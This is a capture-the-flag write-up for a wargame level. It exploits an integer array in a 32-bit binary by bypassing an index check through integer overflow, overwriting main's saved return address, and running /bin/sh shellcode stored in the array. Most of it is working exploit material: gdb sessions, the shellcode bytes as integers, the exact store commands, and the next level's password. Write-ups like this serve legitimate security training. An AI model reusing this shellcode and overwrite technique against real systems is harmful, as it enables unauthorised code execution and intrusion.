# Level 07

## First step - analysing

Interesting functions composing the executable.  

```bash
...
0x080485c4  clear_stdin
0x080485e7  get_unum
0x0804861f  prog_timeout
0x08048630  store_number
0x080486d7  read_number
0x08048723  main
...
```

After disassembling each function we can conclude a couple of things about how the program behaves.  

- clear_stdin()

> Self explanatory

- get_unum()

>  Call in *store_number()* and  *read_number()*, use to get inputs entered by the user through stdin.  

- prog_timeout()

> Self explanatory

- store_number()

> Ask for a number and an index **multiply by 4** where this number will be stored. Does a checking on the index entered, if the index % 3 is not equal to 0 then it stores the number in an array of ints at the specified index **multiplied by 4** after the checking is done. Else it is not possible to store the number at the index, the function returns.    

- read_number()

> Takes an index as input, **multiply it by 4**, then returns the number stored at the result.  

- main()

> Reads the standard input and stores the content in a buffer. If the input matches one for the 3 keywords, "store", "read", "quit" it behaves accordingly passing an array of ints to the store and read functions.  

So now we have a pretty clear idea about how the program behaves. It stores in an array some numbers passed as input at the desired index when it is possible, and we can read this array's content.  
The environment and arguments passed to *main()* are removed, meaning we cannot set an environment variable holding a shellcode.  
The char buffer is not exploitable since it is filled using *sgets*, but the int array is not protected in length, so we can try an overflow with it, plus we can use it to store values of a shellcode!  
What we need to keep in mind tough, in order to exploit the array, is that we cannot use all the indexes of the array of numbers, all the indexes returning 0 when index % 3 is applied are reserved.  

## Second step - exploit

### Get main's eip

```bash
$> gdb level07
(gdb) b *main
(gdb) r
(gdb) info frame
Stack level 0, frame at 0xffffd710:
 eip = 0x8048723 in main; saved eip 0xf7e45513
 Arglist at unknown address.
 Locals at unknown address, Previous frame's sp is 0xffffd710
 Saved registers:
  eip at 0xffffd70c # eip's address
```

- eip = **0xffffd70c**

### Get eip's offset from int array

The int array is declared in *main()*, but it is only used in either *store_number()* or *read_number()*.  
In order to get its address we can set a breakpoint in either one of the functions, since the array is the only parameter of both functions we can get its value easily.  

```bash
(gdb) b *read_number+6
Breakpoint 1 at 0x80486dd
(gdb) r
# ...
Breakpoint 1, 0x080486dd in read_number ()
(gdb) x/x $ebp+0x8 # function's first parameter
0xffffd520:	0xffffd544 # address
```

We can also get it from *main()* to make sure we get the right address.  

```bash
(gdb) b *main+114
Breakpoint 1 at 0x8048795
(gdb) r
Starting program: /home/users/level07/level07

Breakpoint 1, 0x08048795 in main ()
(gdb) x/x $ebx # register holding int array address after lea instruction
0xffffd544:	0x00000000
# address = 0xffffd544
```

- Array = **0xffffd544**

- **Offset** = 0xffffd70c - 0xffffd544 = **456**


### Shellcode
```bash
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
```

Splitting the shellcode 4 bytes at a time, results in 7 chunks.    

- 0: 0x31c05068 = 0x6850c031 = 1750122545
- 1: 0x6e2f7368 = 0x68732f6e = 1752379246
- 2: 0x682f2f62 = 0x622f2f68 = 1647259496
- 3: 0x6989e350 = 0x50e38969 = 1357089129
- 4: 0x89e15089 = 0x8950e189 = 2303779209
- 5: 0xe2b00bcd = 0xcd0bb0e2 = 3440095458
- 6: 0x80 = 128

### Exploit

What we need to do is:  

- Store our shellcode spawning a shell in our int array
- Replace *main()*'s return pointer (eip) with our int array address to get our shellcode executed.

Our shell code can be divided in 7 chunks, each chunk can be store in the int array, from index 0 to 6.  
Knowing our offset is **456**, the index in the array where we should place our shellcode's address to over write *main*'s eip is **114**.   

- 456 / 4 (int size) = 114

It will not be possible to store our shellcode at indexes 0, 3, 6 and our address at index **114** by passing those indexes values directly, because as we previously saw, all indexes returning 0 for i % 3 are reserved.  

- (0 * 4) % 3 = **0**
- (1 * 4) % 3 = 1
- (2 * 4) % 3 = 2
- (3 * 4) % 3 = **0**
- (4 * 4) % 3 = 1
- (5 * 4) % 3 = 2
- (6 * 4) % 3 = **0**
- (114 * 4) % 3 = **0**

Since the index value is checked before being multiplied by 4, we can overflow the reserved indexes (int) to pass the modulo condition. Then, the integer overflow when multiplied by 4 will set our index to the desired values.  

- UINT_MAX = (2 ^ 32) - 1 

Using python console to get correct values after overflow (multiplied by 4).  

```bash
>>> 2**32 / 4
1073741824 # index 0
>>> (2**32 / 4) + 3
1073741827 # index 3
>>> (2**32 / 4) + 6
1073741830 # index 6
>>> (2**32 / 4) + 114
1073741938 # index 114
```

```bash
#proof
>>> (2**32 / 4) + 3
1073741827
>>> ((1073741827*4)-2**32) / 4
3
```

Matching shellcode chunks + indexes values alltogether:  
- index 0: 1073741824 -> Shellcode chunk: 1750122545
- index 1: 1          -> Shellcode chunk: 1752379246
- index 2: 2          -> Shellcode chunk: 1647259496
- index 3: 1073741827 -> Shellcode chunk: 1357089129
- index 4: 4          -> Shellcode chunk: 2303779209
- index 5: 5          -> Shellcode chunk: 3440095458
- index 6: 1073741830 -> Shellcode chunk: 128
- index 114: 1073741938 -> Shellcode address: 0xffffd544 -> 4294956356

By running the exploit in gdb we get a message saying a new program is executed:  

```bash
process 1680 is executing new program: /bin/dash
```

Meaning our shell is spawn. The problem is, when we try to do the exploit outside of gdb, nothing happens because our buffer's address is unvalid.  
This is caused by gdb who alters the stack size by updating the environment. As we saw in some previous exercices were the address of our shellcode was saved in an environment variable and was not the same when gotten from gdb or outside.   

### Getting array real address outside gdb

We can see from within gdb, 2 extra environment variables in our env taking 16 bytes.  

```bash
(gdb) show env
...
LINES=62
COLUMNS=101
...
(gdb) unset env LINES
(gdb) unset env COLUMNS
```

Now that they are removed, we should get closer to our real address.  

```bash
(gdb) b *read_number+3
Breakpoint 1 at 0x80486da
(gdb) r
...
(gdb) x/x $ebp+8
0xffffd530:	0xffffd554
```

```bash
>>> 0xffffd554-0xffffd544
16
```

But still does not work.  
By testing manually values bellow our buffer address, 4 bytes at a time we ended up in getting the right address when: 

> 4 * 4 = 16

> 0xffffd554 == 4294956372 && 0xffffd564 == 4294956388

> 4294956388 - 4294956372 = 16 == 0x10

Meaning the difference of addresses between gdb and outside gdb for the array is **32** bits.  

> 0xffffd564 - 0xffffd544 = 0x20 == 32 == 16 + 16

The final array address to use is:  
- index 114: 1073741938 -> Shellcode address: 0xffffd564 -> 4294956388

```bash
Input command: store
 Number: 1750122545
 Index: 1073741824
 Completed store command successfully
Input command: store
 Number: 1752379246
 Index: 1
 Completed store command successfully
Input command: store
 Number: 1647259496
 Index: 2
 Completed store command successfully
Input command: store
 Number: 1357089129
 Index: 1073741827
 Completed store command successfully
Input command: store
 Number: 2303779209
 Index: 4
 Completed store command successfully
Input command: store
 Number: 3440095458
 Index: 5
 Completed store command successfully
Input command: store
 Number: 128
 Index: 1073741830
 Completed store command successfully
Input command: store
 Number: 4294956388
 Index: 1073741938
 Completed store command successfully
Input command: quit
$ cd ../level08
$ cat .pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
```

## Ressources  

- https://aakinshin.net/posts/perfex-div/
- https://stackoverflow.com/questions/40893026/mul-function-in-assembly
- https://stackoverflow.com/questions/32345320/get-return-address-gdb
- https://www.cs.utah.edu/~regehr/papers/overflow12.pdf
- https://stackoverflow.com/questions/32771657/gdb-showing-different-address-than-in-code
- https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it
